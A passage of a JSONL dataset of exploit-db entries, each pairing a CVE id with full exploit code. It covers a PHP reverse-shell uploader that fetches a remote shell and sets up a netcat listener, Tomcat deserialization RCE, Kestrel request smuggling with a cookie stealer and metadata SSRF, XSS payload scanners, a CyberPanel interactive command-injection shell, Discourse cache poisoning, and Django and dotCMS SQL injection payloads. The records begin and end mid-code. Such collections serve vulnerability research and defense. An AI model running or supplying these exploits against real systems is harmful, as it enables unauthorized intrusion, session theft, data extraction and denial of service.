str(uuid.uuid4())+\".php\"\n if len(sys.argv) > 2:\n if sys.argv[2] == \"--rev\":\n revshell = \"https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\"\n print(\"\\033[94m[inf]:\\033[0m generating a php reverse shell to upload..\")\n ip = input(\"\\033[93m[ins]:\\033[0m enter listener ip / domain: \")\n port = input(\"\\033[93m[ins]:\\033[0m enter listenter port: \")\n print(f\"\\033[93m[ins]:\\033[0m start a listener, execute nc -lvnp {port}\")\n input(\"\\033[93m[ins]:\\033[0m press enter to continue...\")\n print(\"\\033[94m[inf]:\\033[0m downloading php-reverse-shell from github/pentestmonkey...\")\n response = requests.get(revshell)\n if response.status_code == 200:\n payload = response.text.replace(\"127.0.0.1\", ip).replace(\"1234\", port) # replacing default values with user input\n with open(payload_name, \"w\") as file:\n file.write(payload)\n payload_url = upload_to_server(payload_name,target_server_url)\n print(\"\\033[94m[inf]:\\", "cve_id": "CVE-2024-42640", "source": "exploitdb", "timestamp": "2025-04-17T00:00:00+00:00"} {"id": "0d4405eb49d976942601", "text": "Apache Tomcat 11.0.3 - Remote Code Execution\n\n# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution\n# Exploit Author: Al Baradi Joy\n# CVE: CVE-2025-24813\n# Date: 2025-04-06\n# Vendor Homepage: https://tomcat.apache.org/\n# Software Link: https://tomcat.apache.org/download-90.cgi\n# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98\n# Tested on: Apache Tomcat 10.1.33\n# CVSS: 9.8 (CRITICAL)\n# CWE: CWE-44, CWE-502\n# Reference:\nhttps://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html\n\nimport requests\nimport random\nimport string\nimport sys\n\ndef rand_filename(length=6):\n return ''.join(random.choices(string.ascii_lowercase, k=length))\n\ndef generate_payload(interact_url):\n # Java serialized payload gadget triggering DNS interaction\n return f'\\xac\\xed\\x00\\x05...' # Replace with actual gadget bytes or\ngenerator\n\ndef exploit(target, interact_url):\n filename = rand_filename()\n put_url = f\"{target}/{filename}.session\"\n get_url = f\"{target}/{filename}\"\n headers = {\n \"Content-Range\": \"bytes 0-452/457\",\n \"Content-Type\": \"application/octet-stream\"\n }\n payload = generate_payload(interact_url)\n\n print(\"[+] Exploit for CVE-2025-24813\")\n print(\"[+] Made By Al Baradi Joy\\n\")\n print(f\"[+] Uploading payload to: {put_url}\")\n r1 = requests.put(put_url, data=payload, headers=headers)\n if r1.status_code == 201:\n print(\"[+] Payload uploaded successfully.\")\n else:\n print(f\"[-] Upload failed with status: {r1.status_code}\")\n return\n\n print(f\"[+] Triggering payload via: {get_url}\")\n cookies = {\"JSESSIONID\": f\".{filename}\"}\n r2 = requests.get(get_url, cookies=cookies)\n print(f\"[+] Trigger request sent. Check for DNS callback to:\n{interact_url}\")\n\nif __name__ == \"__main__\":\n # Display banner first\n print(\"[+] Exploit for CVE-2025-24813\")\n print(\"[+] Made By Al Baradi Joy\\n\")\n\n # Ask the user for the target domain and interact URL\n target_url = input(\"Enter the target domain (e.g., http://localhost:8080):\n\")\n interact_url = input(\"Enter your interactsh URL: \")\n\n exploit(target_url, interact_url)", "cve_id": "CVE-2025-24813", "source": "exploitdb", "timestamp": "2025-04-07T00:00:00+00:00"} {"id": "86255a81632fcd68dff3", "text": "ASP.net 8.0.10 - Bypass\n\n# Exploit Title: ASP.net 8.0.10 - Bypass\n# Date: 2025-11-03\n# Author: Mohammed Idrees Banyamer\n# Author Country: Jordan\n# Instagram: @banyamer_security\n# GitHub: https://github.com/mbanyamer\n# CVE: CVE-2025-55315\n# Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment)\n# Platform: remote\n# Type: webapps\n# Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding\n# CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n#\n# Description:\n# This exploit demonstrates a critical HTTP Request Smuggling vulnerability in\n# unpatched versions of .NET Kestrel due to improper handling of malformed\n# chunk extensions (LF-only line endings). The script performs:\n# 1. Automatic fingerprinting to detect vulnerable instances\n# 2. Auth bypass to access restricted endpoints (/admin)\n# 3. Session hijacking via response queue poisoning (JS cookie stealer)\n# 4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)\n# Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.\n#\n# The vulnerability allows full remote compromise: authentication bypass,\n# session theft, and internal network access — all from a single HTTP request.\n#\n# Patched in .NET 9.0.1 / 8.0.10+ (October 2025).\n#\n# IMPORTANT SAFETY :\n# - DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.\n# - Use only in isolated environments (VM, Docker with --network none).\n# - All payloads are educational and non-destructive by design.\n# - Modify payloads only within your controlled lab.\n#\n# References:\n# - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315\n# - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315\n\n\nfrom __future__ import annotations\nimport socket\nimport ssl\nimport time\nimport argparse\nimport json\nimport os\nfrom typing import Tuple, Optional\n\nDEFAULT_TIMEOUT = 3.0\nREAD_CHUNK = 4096\nREPORT_DIR = \"kestrel_desync_reports\"\nos.makedirs(REPORT_DIR, exist_ok=True)\n\n# ------------------ Utilities ------------------\ndef now_iso() -> str:\n return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())\n\ndef hexdump(b: bytes, maxlen: int = 200) -> str:\n shown = b[:maxlen]\n hexed = ' '.join(f\"{x:02x}\" for x in shown)\n return f\"{hexed} ...\" if len(b) > maxlen else hexed\n\ndef save_file(path: str, data: bytes) -> None:\n try:\n with open(path, 'wb') as f:\n f.write(data)\n print(f\"[+] Saved: {path}\")\n except Exception as e:\n print(f\"[!] Save failed: {e}\")\n\n# ------------------ Networking ------------------\ndef send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(DEFAULT_TIMEOUT)\n try:\n if use_tls:\n ctx = ssl.create_default_context()\n s = ctx.wrap_socket(s, server_hostname=host)\n s.connect((host, port))\n s.sendall(data)\n\n parts = []\n while True:\n try:\n chunk = s.recv(READ_CHUNK)\n if not chunk: break\n parts.append(chunk)\n except socket.timeout:\n break\n resp = b''.join(parts)\n\n s.settimeout(0.2)\n try:\n s.recv(1)\n open_flag = True\n except:\n open_flag = False\n s.close()\n return resp, open_flag\n except Exception:\n return None, False\n\n# ------------------ Request Builder (WAF Bypass) ------------------\ndef build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes:\n headers = [\n f\"{method} {path} HTTP/1.1\",\n \"Host: localhost\",\n \"Transfer-Encoding: chUnKEd\", # WAF Bypass\n \"Content-Type: text/plain\",\n ]\n if extra_headers:\n headers.extend(extra_headers)\n headers.extend([\"\", \"\"])\n return \"\\r\\n\".join(headers).encode() + body\n\n# ------------------ Fingerprint ------------------\ndef fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:\n print(f\"[*] Fingerprinting {host}:{port}...\")\n payload = b\"1\\nx\\n0\\n\\n\"\n req = build_chunked(\"POST\", \"/\", payload)\n resp, _ = send_http(host, port, req, use_tls)\n if resp and b\"400\" not in resp.split(b'\\r\\n', 1)[0]:\n print(f\"[!] VULNERABLE: Accepted LF-only chunk!\")\n return True, resp\n print(f\"[+] Patched: 400 Bad Request\")\n return False, resp\n\n# ------------------ Exploit Chain ------------------\ndef exploit_chain(host: str, port: int, use_tls: bool):\n results = []\n\n # 1. Auth Bypass\n print(f\"[!] 1. Auth Bypass → /admin\")\n smug_admin = b\"0\\r\\n\\r\\nGET /admin HTTP/1.1\\r\\nHost: localhost\\r\\nX-Bypass: yes\\r\\n\\r\\n\"\n req1 = build_chunked(\"POST\", \"/\", b\"1;ext\\nx\\n\" + smug_admin, [\"Content-Length: 50\"])\n resp1, _ = send_http(host, port, req1, use_tls)\n if resp1 and (b\"admin\" in resp1.lowe", "cve_id": "CVE-2025-55315", "source": "exploitdb", "timestamp": "2026-04-06T00:00:00+00:00"} {"id": "fedbc0e180eedc504671", "text": "atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)\n\n/*\n * Exploit Title : atjiu pybbs 6.0.0 - Cross Site Scripting (XSS)\n * Exploit Author: Byte Reaper\n * Vendor Homepage: https://github.com/atjiu/pybbs\n * Tested on: Kali Linux\n * CVE: CVE-2025-8550\n * ------------------------------------------------------------------------------------------------------------------------------------\n */\n\n#include \n#include \n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#include \n#include \n\n#define FULL_URL 3500\n#define FULL_PAYLOAD_URL 9000\n#define BUFFER_SIZE 6000\nint selCookie = 0;\nconst char *cookies = NULL;\nconst char *baseurl = NULL;\nconst char *nameFileC= NULL;\nint cookiesPayload = 0;\nconst char *ip = NULL;\nint port = 0;\nint verbose = 0;\n\nint serchServer_alt()\n{\n printf(\"\\e[0;35m============================================ [SEARCH PROCESS] ============================================\\e[0m\\n\");\n\n const char *nameProcess[] =\n {\n \"python\",\n \"apache2\",\n \"python3\",\n \"mysql\",\n NULL\n\n };\n DIR *d = opendir(\"/proc\");\n if (!d) return 1;\n struct dirent *entry;\n while ((entry = readdir(d)) != NULL)\n {\n if (!isdigit(entry->d_name[0])) continue;\n char cmdpath[256];\n snprintf(cmdpath, sizeof(cmdpath), \"/proc/%s/comm\", entry->d_name);\n FILE *f = fopen(cmdpath, \"r\");\n if (!f) continue;\n char comm[256];\n if (fgets(comm, sizeof(comm), f))\n {\n for (int i = 0; nameProcess[i]; i++)\n {\n if (strstr(comm, nameProcess[i]))\n {\n printf(\"\\e[0;34m[+] Process found: %s (PID: %s)\\e[0m\\n\", nameProcess[i], entry->d_name);\n closedir(d);\n return 0;\n }\n }\n }\n fclose(f);\n }\n closedir(d);\n return 1;\n printf(\"\\e[0;35m==========================================================================================================\\e[0m\\n\");\n}\nvoid exitSyscall()\n{\n __asm__ volatile\n (\n \"mov $0x3C, %%rax\\n\\t\"\n \"xor %%rdi, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n :\"rax\", \"rdi\"\n );\n}\n\nint checkLen(int len, char *buf, size_t bufcap)\n{\n if (len < 0 || (size_t)len >= bufcap)\n {\n printf(\"\\e[0;31m[-] Len is Long ! \\e[0m\\n\");\n printf(\"\\e[0;31m[-] Len %d\\e[0m\\n\", len);\n exitSyscall();\n return 1;\n }\n else\n {\n printf(\"\\e[0;34m[+] Len Is Not Long (%d).\\e[0m\\n\",len);\n return 0;\n\n }\n return 0;\n}\nvoid nanoSleep(void)\n{\n struct timespec ob;\n ob.tv_sec = 0;\n ob.tv_nsec = 500 * 1000 * 1000;\n\n __asm__ volatile\n (\n \"mov $230, %%rax\\n\\t\"\n \"mov $1, %%rdi\\n\\t\"\n \"xor %%rsi, %%rsi\\n\\t\"\n \"mov %0, %%rdx\\n\\t\"\n \"xor %%r10, %%r10\\n\\t\"\n \"syscall\\n\\t\"\n :\n : \"r\"(&ob)\n : \"rax\",\n \"rdi\",\n \"rsi\",\n \"rdx\",\n \"r10\",\n \"memory\"\n );\n}\n\nconst char *payloads[] =\n{\n \"\",\n \"\\\">\",\n \"\",\n \"\",\n \"\",\n \"click\",\n \"XSS\",\n \"\",\n \"\\\">\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"
\",\n \"\",\n \"
\",\n \"\",\n \"javascript:alert`1`\",\n \"javascript:alert(1)\",\n \"\",\n NULL\n};\n\nconst char *wordPayloadXss[] =\n{\n \"\n5. Save the configuration changes\n6. Visit any frontend page of the website\n\nObserve JavaScript alert execution on page load", "cve_id": "CVE-2025-8573", "source": "exploitdb", "timestamp": "2025-09-16T00:00:00+00:00"} {"id": "2793f885f7591b2af613", "text": "Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)\n\n/*\n * Author : Byte Reaper\n * CVE : CVE-2025-54589\n * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)\n * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization,\n allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser\n*/\n\n#include \n#include \n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#include \n\n#define FULL_URL 2500\n#define COLOR_RESET \"\\e[0m\"\n#define COLOR_RED \"\\e[1;31m\"\n#define COLOR_GRN \"\\e[1;32m\"\n#define COLOR_YEL \"\\e[1;33m\"\n#define COLOR_BLU \"\\e[1;34m\"\n#define COLOR_CYN \"\\e[1;36m\"\n#define COLOR_WHT \"\\e[1;37m\"\n#define COLOR_PUR \"\\e[1;35m\"\n#define PRINT_OK(fmt, ...) print_color(COLOR_GRN, \"\" fmt, ##__VA_ARGS__)\n#define PRINT_ERR(fmt, ...) print_color(COLOR_RED, \"\" fmt, ##__VA_ARGS__)\n#define PRINT_WARN(fmt, ...) print_color(COLOR_YEL, \"\" fmt, ##__VA_ARGS__)\n#define PRINT_INFO(fmt, ...) print_color(COLOR_BLU, \"\" fmt, ##__VA_ARGS__)\n#define PRINT_NOTE(fmt, ...) print_color(COLOR_CYN, \"\" fmt, ##__VA_ARGS__)\n\nint verbose = 0;\nint useC = 0;\nconst char *ipT = NULL;\nint portT = 0;\nconst char *cookies = NULL;\nconst char *caFile = NULL;\nint sCa = 0;\nint useColor = 1;\nint useHttp = 0;\nvoid print_color(const char *color, const char *fmt, ...)\n{\n va_list args;\n va_start(args, fmt);\n if (useColor)\n {\n printf(\"%s\", color);\n }\n\n vprintf(fmt, args);\n if (useColor)\n {\n printf(\"%s\", COLOR_RESET);\n }\n\n va_end(args);\n}\nvoid exitAssembly()\n{\n __asm__ volatile\n (\n \"xor %%rdi, %%rdi\\n\\t\"\n \"mov $231, %%rax\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n : \"rax\",\n \"rdi\"\n );\n}\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\nsize_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)\n{\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (tmp == NULL)\n {\n PRINT_ERR(\"[-] Failed to allocate memory!\\n\");\n exitAssembly();\n }\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\nconst char *payloadXss[] =\n{\n\n \"\",\n \"javascript:alert(XSS);\",\n \"javascript:alert(byte);\"\n};\nint number = sizeof(payloadXss) / sizeof(payloadXss[0]);\nconst char *wordF[] =\n{\n \"Error\",\n \"Exception\",\n \"Invalid\",\n \"XSS\",\n \"\",\n \"alert(1)\",\n \"syntax\",\n \"unexpected\",\n \"undefined\",\n \"NaN\",\n \"stack trace\",\n \"TypeError\",\n \"ReferenceError\",\n \"Warning\",\n \"Access denied\",\n \"eval(\",\n \"byte\",\n};\nint numberW = sizeof(wordF) / sizeof(wordF[0]);\n\n\nvoid auto_detect_color()\n{\n if (!isatty(fileno(stdout)))\n {\n useColor = 0;\n }\n}\nvoid senR(const char *ip, int port)\n{\n char full[FULL_URL];\n CURLcode res ;\n CURL *curl = curl_easy_init();\n struct Mem response ;\n response.buffer= NULL;\n response.len = 0;\n for (int h = 0; h < number ; h++)\n {\n if (!curl)\n {\n PRINT_ERR(\"[-] Error Create Object Curl !\\n\");\n PRINT_ERR(\"[-] Check Your Connection\\n\");\n exitAssembly();\n\n }\n if (verbose)\n {\n PRINT_OK(\"==========================================\\n\");\n PRINT_OK(\"[1;33m[+] Cleaning Response...\\n\");\n PRINT_OK(\"[1;33m[+] Response Buffer : NULL\\n\");\n PRINT_OK(\"[1;33m[+] Response Len : 0\\n\");\n PRINT_OK(\"==========================================\\n\");\n }\n if (curl)\n {\n\n char *payloadE = curl_easy_escape(curl,\n payloadXss[h],\n 0);\n struct curl_slist *headers = NULL;\n if (!payloadE)\n {\n PRINT_ERR(\"[-] Error Encode Payload !\\e[0m\\n\");\n curl_slist_free_all(headers);\n curl_easy_cleanup(curl);\n exitAssembly();\n }\n\n const char *proto = useHttp ? \"http\" : \"https\";\n int len1 = snprintf(full, sizeof(full), \"%s://%s:%d/?filter=%s\", proto, ip, port, payloadE);\n if (len1 >= sizeof(full))\n {\n PRINT_ERR(\"[-] URL too long\\n\");\n exitAssembly();\n }\n PRINT_INFO(\"[+] Encode Payload : %s\\n\", payloadXss[h]);\n PRINT_INFO(\"[+] Encode Payload Successfully.\\n\");\n PRINT_INFO(\"[+] Payload Encode : %s\\n\", payloadE);\n PRINT_INFO(\"[+] target IP : %s\\n\",\n ip);\n print", "cve_id": "CVE-2025-54589", "source": "exploitdb", "timestamp": "2025-08-03T00:00:00+00:00"} {"id": "6e2061aaf8ab73c9f36e", "text": "CyberPanel 2.3.6 - Remote Code Execution (RCE)\n\n# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)\n# Date: 10/29/2024\n# Exploit Author: Luka Petrovic (refr4g)\n# Vendor Homepage: https://cyberpanel.net/\n# Software Link: https://github.com/usmannasir/cyberpanel\n# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)\n# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)\n# CVE: CVE-2024-51378\n# PoC Repository: https://github.com/refr4g/CVE-2024-51378\n# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/\n\n#!/usr/bin/python3\n\nimport argparse\nimport httpx\nimport sys\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nCYAN = \"\\033[96m\"\nMAGENTA = \"\\033[95m\"\nYELLOW = \"\\033[93m\"\nRESET = \"\\033[0m\"\n\nprint(f\"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit\")\nprint(f\"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}\")\nprint()\n\nallowed_endpoints = [\"/ftp/getresetstatus\", \"/dns/getresetstatus\"]\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target\", help=f\"{CYAN}Target URL (with http/https prefix){RESET}\")\nparser.add_argument(\"endpoint\", help=f\"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}\")\nargs = parser.parse_args()\n\nif args.endpoint not in allowed_endpoints:\n print(f\"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}\")\n parser.print_help()\n sys.exit(1)\n\ntarget = args.target\nendpoint = args.endpoint\n\nclient = httpx.Client(base_url=target, verify=False)\n\ntry:\n response = client.get(\"/\")\n response.raise_for_status()\nexcept httpx.RequestError:\n print(f\"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}\")\n sys.exit(1)\n\ndef get_token():\n response = client.get(\"/\")\n return response.cookies.get(\"csrftoken\")\n\ndef rce(client, csrf_token, cmd, endpoint):\n headers = {\n \"X-CSRFToken\": csrf_token,\n \"Content-Type\": \"application/json\",\n \"Referer\": str(client.base_url)\n }\n payload = '{\"statusfile\": \"; %s; #\"}' % cmd\n response = client.request(\"OPTIONS\", endpoint, headers=headers, data=payload)\n return response.json().get(\"requestStatus\")\n\ncsrf_token = get_token()\nif not csrf_token:\n print(f\"{RED}Failed to retrieve CSRF token. Exiting.{RESET}\")\n sys.exit(1)\n\nwhile True:\n cmd = input(f\"{YELLOW}$> {RESET}\")\n print(rce(client, csrf_token, cmd, endpoint))", "cve_id": "CVE-2024-51378", "source": "exploitdb", "timestamp": "2025-04-11T00:00:00+00:00"} {"id": "06554dee55d59b6ed81f", "text": "Discourse 3.2.x - Anonymous Cache Poisoning\n\n#!/usr/bin/env python3\n\"\"\"\nExploit Title: Discourse 3.2.x - Anonymous Cache Poisoning\nDate: 2024-10-15\nExploit Author: ibrahimsql\nGithub: : https://github.com/ibrahmsql\nVendor Homepage: https://discourse.org\nSoftware Link: https://github.com/discourse/discourse\nVersion: Discourse < latest (patched)\nTested on: Discourse 3.1.x, 3.2.x\nCVE: CVE-2024-47773\nCVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)\n\nDescription:\nDiscourse anonymous cache poisoning vulnerability allows attackers to poison\nthe cache with responses without preloaded data through multiple XHR requests.\nThis affects only anonymous visitors of the site.\n\nReference:\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-47773\n\"\"\"\n\nimport requests\nimport sys\nimport argparse\nimport time\nimport threading\nimport json\nfrom urllib.parse import urljoin\n\nclass DiscourseCachePoisoning:\n def __init__(self, target_url, threads=10, timeout=10):\n self.target_url = target_url.rstrip('/')\n self.threads = threads\n self.timeout = timeout\n self.session = requests.Session()\n self.session.headers.update({\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'X-Requested-With': 'XMLHttpRequest'\n })\n self.poisoned = False\n\n def check_target(self):\n \"\"\"Check if target is accessible and running Discourse\"\"\"\n try:\n response = self.session.get(f\"{self.target_url}/\", timeout=self.timeout)\n if response.status_code == 200:\n if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:\n return True\n except Exception as e:\n print(f\"[-] Error checking target: {e}\")\n return False\n\n def check_anonymous_cache(self):\n \"\"\"Check if anonymous cache is enabled\"\"\"\n try:\n # Test endpoint that should be cached for anonymous users\n response = self.session.get(f\"{self.target_url}/categories.json\", timeout=self.timeout)\n\n # Check cache headers\n cache_headers = ['cache-control', 'etag', 'last-modified']\n has_cache = any(header in response.headers for header in cache_headers)\n\n if has_cache:\n print(\"[+] Anonymous cache appears to be enabled\")\n return True\n else:\n print(\"[-] Anonymous cache may be disabled\")\n return False\n\n except Exception as e:\n print(f\"[-] Error checking cache: {e}\")\n return False\n\n def poison_cache_worker(self, endpoint):\n \"\"\"Worker function for cache poisoning attempts\"\"\"\n try:\n # Create session without cookies to simulate anonymous user\n anon_session = requests.Session()\n anon_session.headers.update({\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'X-Requested-With': 'XMLHttpRequest'\n })\n\n # Make rapid requests to poison cache\n for i in range(50):\n response = anon_session.get(\n f\"{self.target_url}{endpoint}\",\n timeout=self.timeout\n )\n\n # Check if response lacks preloaded data\n if response.status_code == 200:\n try:\n data = response.json()\n # Check for missing preloaded data indicators\n if self.is_poisoned_response(data):\n print(f\"[+] Cache poisoning successful on {endpoint}\")\n self.poisoned = True\n return True\n except:\n pass\n\n time.sleep(0.1)\n\n except Exception as e:\n pass\n return False\n\n def is_poisoned_response(self, data):\n \"\"\"Check if response indicates successful cache poisoning\"\"\"\n # Look for indicators of missing preloaded data\n indicators = [\n # Missing or empty preloaded data\n not data.get('preloaded', True),\n data.get('preloaded') == {},\n # Missing expected fields\n 'categories' in data and not data['categories'],\n 'topics' in data and not data['topics'],\n # Error indicators\n data.get('error') is not None,\n data.get('errors') is not None\n ]\n\n return any(indicators)\n\n def test_cache_poisoning(self):\n \"\"\"Test cache poisoning on multiple endpoints\"\"\"\n print(\"[*] Testing cache poisoning vulnerability...\")\n\n # Target endpoints that are commonly cached\n endpoints = [\n '/categories.json',\n '/latest.json',\n '/top.json", "cve_id": "CVE-2024-47773", "source": "exploitdb", "timestamp": "2025-07-08T00:00:00+00:00"} {"id": "562c50f4ab435c0662cd", "text": "Django 5.1.13 - SQL Injection\n\n# Exploit Title: Django 5.1.13 - SQL Injection\n# Google Dork: [none] # Not applicable for this vulnerability\n# Date: 2025-12-03\n# Exploit Author: Wafcontrol Security Team\n# Vendor Homepage: https://www.djangoproject.com/\n# Software Link: https://www.djangoproject.com/download/\n# Version: 5.2 before 5.2.8, 5.1 before 5.1.14, 4.2 before 4.2.26 (possibly earlier versions like 5.0.x, 4.1.x, 3.2.x)\n# Tested on: Ubuntu 24.04 with Django 5.1.13 (vulnerable version)\n# CVE: 2025-64459\n\n\nDescription:\nThis proof-of-concept exploits a SQL injection vulnerability in Django's QuerySet methods (filter, exclude, get) and Q objects\nwhen using a crafted dictionary with expansion as the _connector argument. The vulnerability allows an attacker to inject\narbitrary SQL into the WHERE clause, potentially leading to data leakage, modification, or other database compromises.\n\nThe script targets a vulnerable Django application endpoint that accepts user input for the _connector parameter.\nIt supports multiple modes:\n- baseline: Send a safe request and display results.\n- exploit: Send an exploit payload and compare with baseline.\n- multi: Test multiple payloads sequentially.\n- check: Automatically check if the target appears vulnerable.\n\nUsage:\npython3 exploit.py -u [options]\n\nModes:\n- baseline: Run a safe baseline test.\n- exploit: Run an exploit test with a single payload.\n- multi: Test multiple payloads (use -p multiple times or comma-separated).\n- check: Quick vulnerability check using default payloads.\n\nExamples:\npython3 exploit.py baseline -u http://target/\npython3 exploit.py exploit -u http://target/ -p \"OR 1=1 OR\"\npython3 exploit.py multi -u http://target/ -p \"OR 1=1 OR\" -p \"AND 1=0 AND\"\npython3 exploit.py check -u http://target/\n\nOptions:\n- -b, --baseline: Baseline connector value (default: 'AND')\n- -v, --verbose: Enable verbose output\n- -o, --output: Save output to a file\n\nRequirements:\n- Python 3.x\n- requests library (pip install requests)\n\nNote:\n- This is for educational and testing purposes only. Use on authorized systems.\n- Ensure the target endpoint exposes the executed SQL (e.g., via debug mode or custom template) for demonstration.\n- In a real scenario, adapt the parsing logic to the application's response structure.\n- For advanced usage, customize payloads for specific SQL dialects (e.g., SQLite, PostgreSQL).\n\n\nimport re\nimport sys\nimport argparse\nimport json\nfrom typing import List, Tuple, Optional\nimport requests\n\nDEFAULT_BASELINE = \"AND\"\nDEFAULT_PAYLOADS = [\"OR 1=1 OR\", \"AND 1=0 AND\", \"OR 'a'='a' OR\"]\n\ndef extract_sql_and_users(html: str) -> Tuple[Optional[str], List[str]]:\n \"\"\"\n Extracts the executed SQL and list of users from the HTML response.\n Assumes the template structure:\n - SQL inside
...
\n - Users inside
  • username – email
  • \n Adjust regex patterns based on the actual response format.\n \"\"\"\n # Extract SQL from the first
    ...
    \n sql_match = re.search(r\"
    (.*?)
    \", html, re.DOTALL)\n executed_sql = sql_match.group(1).strip() if sql_match else None\n\n # Extract users from
  • ...
  • \n users = re.findall(r\"
  • (.*?)
  • \", html)\n users = [u.strip() for u in users if u.strip()]\n\n return executed_sql, users\n\ndef send_payload(target_url: str, connector_value: str, verbose: bool = False) -> Tuple[Optional[str], List[str]]:\n \"\"\"\n Sends a POST request with the connector value as the search field.\n Handles CSRF token extraction and session management.\n Returns the executed SQL and list of users from the response.\n \"\"\"\n if verbose:\n print(f\"[*] Fetching CSRF token from {target_url}...\")\n\n # Step 1: GET request to fetch CSRF token\n try:\n get_resp = requests.get(target_url, timeout=10)\n get_resp.raise_for_status()\n except requests.RequestException as e:\n print(f\"[!] GET request failed: {e}\")\n sys.exit(1)\n\n # Extract csrfmiddlewaretoken from the form\n csrf_match = re.search(r'name=\"csrfmiddlewaretoken\" value=\"([^\"]+)\"', get_resp.text)\n if not csrf_match:\n print(\"[!] Could not find CSRF token in the response.\")\n sys.exit(1)\n csrf_token = csrf_match.group(1)\n\n if verbose:\n print(f\"[i] CSRF token: {csrf_token[:10]}...\")\n\n # Prepare POST data\n data = {\n \"csrfmiddlewaretoken\": csrf_token,\n \"search\": connector_value,\n }\n\n # Use session to maintain cookies (including CSRF)\n session = requests.Session()\n session.cookies.update(get_resp.cookies)\n\n if verbose:\n print(f\"[*] Sending POST with connector = {repr(connector_value)}...\")\n\n # Step 2: POST request with payload\n try:\n post_resp = session.post(target_url, data=data, timeout=10)\n post_resp.raise_for_status()\n except requests.RequestException as e:\n print(f\"[!] POST request failed: {e}\")\n sys.exit(1)\n\n # Parse response\n executed_sql, users = extract_sql_and_users(post_resp.tex", "cve_id": "CVE-2025-64459", "source": "exploitdb", "timestamp": "2025-12-03T00:00:00+00:00"} {"id": "cf62cbb2849c229df841", "text": "dotCMS 25.07.02-1 - Authenticated Blind SQL Injection\n\n#!/usr/bin/env python3\n\n# Exploit Title: dotCMS 25.07.02-1 - Authenticated Blind SQL Injection\n# Google Dork: N/A\n# Date: 2025-09-09\n# Exploit Author: Matan Sandori (OSCP, OSEP, OSWE)\n# Vendor Homepage:*https://www.dotcms.com/\n# Software Link: https://github.com/dotCMS/core/releases/tag/v25.07.02-1 (tested on: v25.07.02-1)\n# Version: Affects 24.03.22 and later (see vendor advisory for fixed versions)\n# Tested on: dotCMS v25.07.02-1 (Docker / Linux)\n# CVE: CVE-2025-8311\n\n\n# The application blocks the comma character, so a simple DoS payload like:\n# ') AND 1=(SELECT 1 FROM generate_series(1,500000) AS a CROSS JOIN generate_series(1,500000) AS b) AND ('FYHh' LIKE 'FYHh\n# will not work.\n\n# Instead, a comma-free payload can be used, for example:\n# ') AND 1=(WITH RECURSIVE nums(i) AS (SELECT 1 UNION ALL SELECT i + 1 FROM nums WHERE i < 1000000) SELECT MIN(1) FROM nums AS a CROSS JOIN nums AS b) AND ('A' LIKE 'A\n\n# Example query for time-based extraction of data:\n# ') AND 1=(SELECT CASE WHEN (substring(emailaddress from 1 for 1)='a') THEN (SELECT 1 FROM pg_sleep(10) WHERE firstname='Admin') ELSE 1 END FROM user_ WHERE firstname='Admin') AND ('1' LIKE '1\n\n# This PoC demonstrates time-based blind SQLi. Error-based SQLi is also possible and allows faster data extraction.\n# Using sqlmap with the --no-cast flag is recommended, as it will not work otherwise.\n\nimport sys\nimport time\nimport string\nimport urllib3\nimport 